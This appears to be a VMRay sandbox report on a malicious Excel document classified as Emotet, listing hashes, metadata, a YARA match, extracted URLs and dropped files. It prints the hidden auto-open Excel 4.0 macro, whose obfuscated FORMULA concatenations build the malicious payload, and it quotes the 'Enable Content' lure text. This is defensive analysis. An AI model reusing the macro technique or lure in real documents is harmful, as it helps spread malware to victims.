Try VMRay Platform
Malicious
Classifications

-

Threat Names

Troj/Emotet-DBG Troj/Emotet-DBH

Dynamic Analysis Report

Created on 2024-11-21T07:04:15+00:00

MEbru4cXDXLIGYq7.xls

Excel Document
...
Filters:
File Name Category Type Verdict Actions
f814d4ee1c82ba7fc85bb7f3289a7de74538bae2c81f58cafe6384f7692ebc5e Sample File Excel Document
Malicious
...
»
MIME Type application/vnd.ms-excel
File Size 70.50 KB
MD5 bd30203cefaf268be8ed83e10ad40179 Copy to Clipboard
SHA1 4d351977148bfc1e1e441118ca5994ca18e96212 Copy to Clipboard
SHA256 f814d4ee1c82ba7fc85bb7f3289a7de74538bae2c81f58cafe6384f7692ebc5e Copy to Clipboard
SSDeep 1536:OhKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+e+hDcnTLiQrRTZws8Egk:uKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMx Copy to Clipboard
ImpHash -
File Reputation Information
»
Verdict
Malicious
Office Information
»
Creator Dream
Last Modified By TYHRETH
Create Time 2015-06-05 20:19 (UTC+2)
Modify Time 2022-05-26 11:19 (UTC+2)
Codepage ANSI_Cyrillic
Application Microsoft Excel
App Version 16.0
Document Security NONE
Именованные диапазоны 2
Листы 4
Макросы Excel 4.0 1
Titles Of Parts Sheet, ESRSGB1, EGSHRHV2, ESHVGRER3, PKEKPPGEKKPGE, MY57, UV76
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
Excel 4.0 Macros (1)
»
Macro #1: PKEKPPGEKKPGE
»
Visibility State HIDDEN
Triggers document:AUTO_OPEN
Labels AUTO_OPEN, MY57, UV76, UV87, _xlfn.ARABIC, _xlfn.CONCAT 
                                                F:3 =FORMULA(ESRSGB1!L24&ESRSGB1!L26&ESRSGB1!L27&ESRSGB1!L28&ESRSGB1!L28&EGSHRHV2!B3&EGSHRHV2!E9&EGSHRHV2!G12&ESRSGB1!F10&EGSHRHV2!J6&ESHVGRER3!D4&EGSHRHV2!F16&ESHVGRER3!Q10&ESHVGRER3!C11&ESHVGRER3!O19,F13)=FORMULA(ESRSGB1!L24&ESRSGB1!G8&ESRSGB1!F4&ESRSGB1!G8&ESRSGB1!O3&ESRSGB1!L30&ESRSGB1!F24&ESRSGB1!O3&ESHVGRER3!Q17&ESHVGRER3!R12&ESRSGB1!A4&ESHVGRER3!P23&ESRSGB1!A4&ESHVGRER3!D25&ESRSGB1!F10&ESHVGRER3!E20&ESHVGRER3!M13&ESHVGRER3!C11&ESRSGB1!F24&ESRSGB1!L31,F17)=FORMULA(ESRSGB1!L24&ESRSGB1!L26&ESRSGB1!L27&ESRSGB1!L28&ESRSGB1!L28&EGSHRHV2!B3&EGSHRHV2!E9&EGSHRHV2!G12&ESRSGB1!F10&EGSHRHV2!J6&ESHVGRER3!D4&EGSHRHV2!G18&ESHVGRER3!Q10&ESHVGRER3!H7&ESHVGRER3!O19,F19)=FORMULA(ESRSGB1!L24&ESRSGB1!G8&ESRSGB1!F4&ESRSGB1!G8&ESRSGB1!O3&ESRSGB1!L30&ESRSGB1!F24&ESRSGB1!O3&ESHVGRER3!Q17&ESHVGRER3!R12&ESRSGB1!A4&ESHVGRER3!P23&ESRSGB1!A4&ESHVGRER3!D25&ESRSGB1!F10&ESHVGRER3!E20&ESHVGRER3!M13&ESHVGRER3!H7&ESRSGB1!F24&ESRSGB1!L31,F21)=FORMULA(ESRSGB1!L24&ESRSGB1!L26&ESRSGB1!L27&ESRSGB1!L28&ESRSGB1!L28&EGSHRHV2!B3&EGSHRHV2!E9&EGSHRHV2!G12&ESRSGB1!F10&EGSHRHV2!J6&ESHVGRER3!D4&EGSHRHV2!H16&ESHVGRER3!Q10&ESHVGRER3!K15&ESHVGRER3!O19,F23)=FORMULA(ESRSGB1!L24&ESRSGB1!G8&ESRSGB1!F4&ESRSGB1!G8&ESRSGB1!O3&ESRSGB1!L30&ESRSGB1!F24&ESRSGB1!O3&ESHVGRER3!Q17&ESHVGRER3!R12&ESRSGB1!A4&ESHVGRER3!P23&ESRSGB1!A4&ESHVGRER3!D25&ESRSGB1!F10&ESHVGRER3!E20&ESHVGRER3!M13&ESHVGRER3!K15&ESRSGB1!F24&ESRSGB1!L31,F25)=FORMULA(ESRSGB1!L24&ESRSGB1!G44&ESRSGB1!H46&ESRSGB1!J44,F35)
Extracted Image Texts (1)
»
Image #1: 0.JPG
»
Most features are disabled. To view and edit document click Enable Editing and click Enable Content.
CFB Streams (3)
»
Name ID Size Actions
Root\Workbook 1 60.32 KB
...
Root\SummaryInformation 2 4.00 KB
...
Root\DocumentSummaryInformation 3 4.00 KB
...
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
Document_Office_VeryHiddenMacro Document contains very hidden Excel 4.0 macro -
2/5
...
c:\users\rdhj0cnfevzx\appdata\roaming\microsoft\excel\0d6c9100 Dropped File Empty
Clean
...
  • Actions
»
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
abd839259596a254039f6615404af4c5f621f78b744ed06094b6f248d17eee4d Downloaded File HTML
Clean
...
»
MIME Type text/html
File Size 140.34 KB
MD5 28369cc39170536b874507a3503cc55f Copy to Clipboard
SHA1 81112157ad79330703674b5da007bf24f1eb50f4 Copy to Clipboard
SHA256 abd839259596a254039f6615404af4c5f621f78b744ed06094b6f248d17eee4d Copy to Clipboard
SSDeep 1536:OnAe7rap61M3hZyQFe2s/AitCzyoOH0M3ZZyQs/qitszya8NuMQMwsRTdN3acgvU:+qucuMQMP3ac6RO Copy to Clipboard
ImpHash -
Extracted URLs (53)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
https://sumuvesa.com/wp-content/plugins/gdpr-cookie-compliance/dist/styles/gdpr-main-nf.css?ver=4.8.6
Show WHOIS
Malicious
-
...
https://sumuvesa.com/oficina-tecnica/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=3.8.1
Show WHOIS
Malicious
-
...
http://s.w.org
Show WHOIS
Not Available
-
...
https://sumuvesa.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0
Show WHOIS
Malicious
-
...
https://sumuvesa.com//wp-includes//js//wp-emoji-release.min.js?ver=6.0.9
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/ultimate-elementor/assets/min-css/uael-frontend.min.css?ver=1.36.6
Show WHOIS
Malicious
-
...
https://sumuvesa.com/xmlrpc.php?rsd
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/astra-addon/astra-addon-673e60da435bb9-97654747.js?ver=3.6.8
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-json/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.11.2
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/wpforms-lite/assets/css/wpforms-base.min.css?ver=1.7.4.2
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/elementor/css/post-5.css?ver=1653663862
Show WHOIS
Malicious
-
...
https://sumuvesa.com
Show WHOIS
Malicious
-
...
https://sumuvesa.com/facanes/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/es/inicio/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/comments/feed/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.8.1
Show WHOIS
Malicious
-
...
https://sumuvesa.com
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.css?ver=6.11.2
Show WHOIS
Malicious
-
...
https://gmpg.org/xfn/11
Show WHOIS
Not Available
-
...
https://sumuvesa.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.5
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/gdpr-cookie-compliance/dist/images/gdpr-logo.png
Show WHOIS
Malicious
-
...
https://sumuvesa.com/cobertes-2/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
Show WHOIS
Malicious
-
...
https://fonts.googleapis.com/css?family=Manrope%3A300%2C400%2C500%2C700%2C800%2C600&display=fallback&ver=3.8.1
Show WHOIS
Not Available
-
...
https://fonts.googleapis.com/css?family=Manrope:200,300,regular,500,600,700,800&subset=latin%2Clatin-ext
Show WHOIS
Not Available
-
...
http://fonts.googleapis.com
Show WHOIS
Not Available
-
...
https://wordpress.org/plugins/gdpr-cookie-compliance/
Show WHOIS
Not Available
-
...
https://sumuvesa.com/wp-includes/wlwmanifest.xml
Show WHOIS
Malicious
-
...
https://test.sumuvesa.com/wp-content/uploads/2021/02/Grupo-109.svg
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/astra-addon/astra-addon-673e60da42d474-75418738.css?ver=3.6.8
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/2020/08/sumuve-1-300x300.png
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.transitions.js?ver=6.11.2
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.11
Show WHOIS
Malicious
-
...
https://sumuvesa.com/feed/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/2021/02/Imagen-1-200x21.png
Show WHOIS
Malicious
-
...
https://s.w.org//images//core//emoji//14.0.0//72x72//
Show WHOIS
Not Available
-
...
https://sumuvesa.com/empresacat/
Show WHOIS
Malicious
-
...
https://sumuvesa.com//wp-content//plugins//gdpr-cookie-compliance
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/uploads/2020/08/sumuve-1-150x150.png
Show WHOIS
Malicious
-
...
https://fonts.googleapis.com/css?family=Manrope%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.0.9
Show WHOIS
Not Available
-
...
https://test.sumuvesa.com/wp-content/uploads/2021/02/Grupo-110.svg
Show WHOIS
Malicious
-
...
https://sumuvesa.com//wp-admin//post.php?post={{id}}&action=edit
Show WHOIS
Malicious
-
...
https://s.w.org//images//core//emoji//14.0.0//svg//
Show WHOIS
Not Available
-
...
https://sumuvesa.com/wp-content/plugins/gdpr-cookie-compliance/dist/scripts/main.js?ver=4.8.6
Show WHOIS
Malicious
-
...
https://sumuvesa.com/desamiantat/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/themes/astra-child/style.css?ver=1.0.0
Show WHOIS
Malicious
-
...
https://sumuvesa.com//wp-admin//admin-ajax.php
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.utils.js?ver=6.11.2
Show WHOIS
Malicious
-
...
https://sumuvesa.com/altresinst/
Show WHOIS
Malicious
-
...
https://sumuvesa.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.9
Show WHOIS
Malicious
-
...
4c13d452dd5d49671bd93ca32f2b4f85c78e39b6ab0ad1f38d98ed267f8fd896 Downloaded File HTML
Clean
...
»
MIME Type text/html
File Size 1.22 KB
MD5 8150f458ed6fb9b1db4e5cfa57a1a281 Copy to Clipboard
SHA1 6e5726854d28687b560d7fdcb5c782c425c7dfb9 Copy to Clipboard
SHA256 4c13d452dd5d49671bd93ca32f2b4f85c78e39b6ab0ad1f38d98ed267f8fd896 Copy to Clipboard
SSDeep 24:hYYIzDImyJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rqLKj2CZLY5Mc6NDLYzkYKLlOM Copy to Clipboard
ImpHash -
6c09a3f77e8a1ce36ffdf1bf0cff8aa9bb5c17616ba8f31db31d8b5946245362 Downloaded File HTML
Clean
...
»
MIME Type text/html
File Size 236 Bytes
MD5 3dea6e4a74ae5c8a6b8dd3bae0de6081 Copy to Clipboard
SHA1 0b2672db2629a86272ca21084220113c548195db Copy to Clipboard
SHA256 6c09a3f77e8a1ce36ffdf1bf0cff8aa9bb5c17616ba8f31db31d8b5946245362 Copy to Clipboard
SSDeep 6:qzxUU76OFFRTEBUP6OFFtlS3u5xsFaRXIFIdt2Sa7VWpQ5MDHyKD:kxl6qFRTEWP6qFtQ37FaRYFo6VW+wHZD Copy to Clipboard
ImpHash -
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 128 Bytes
MD5 cc90851958032b8c8bbb7b24ec6271dd Copy to Clipboard
SHA1 e027ad2ea4049374a3b01af2e3626b667dc816bc Copy to Clipboard
SHA256 c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858 Copy to Clipboard
SSDeep 3:Fl: Copy to Clipboard
ImpHash -
0.JPG Extracted File Image
Clean
...
»
Parent File f814d4ee1c82ba7fc85bb7f3289a7de74538bae2c81f58cafe6384f7692ebc5e
MIME Type image/jpeg
File Size 29.87 KB
MD5 a364160e08361d6e32c8f6372630e140 Copy to Clipboard
SHA1 99b4b14b4d604bc6c1b8ee83d42e5bcc5eb06201 Copy to Clipboard
SHA256 9032d0d0c3701bce90dcd21b51a3b2f1853083d52ed661ad27d22e774af963d5 Copy to Clipboard
SSDeep 768:4+c+hDpn7nYEERIv/JgvRVYrtzoMqZMVs8EE:O+hDVnTLOQrRAZws8EE Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    

     Exit-Icon
    

    

     

      WHOIS Domain Information
     

     

      

       
        Domain Name
       
       
       
      

      

       
        WHOIS Response
       
       
        

       		
      

     

    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image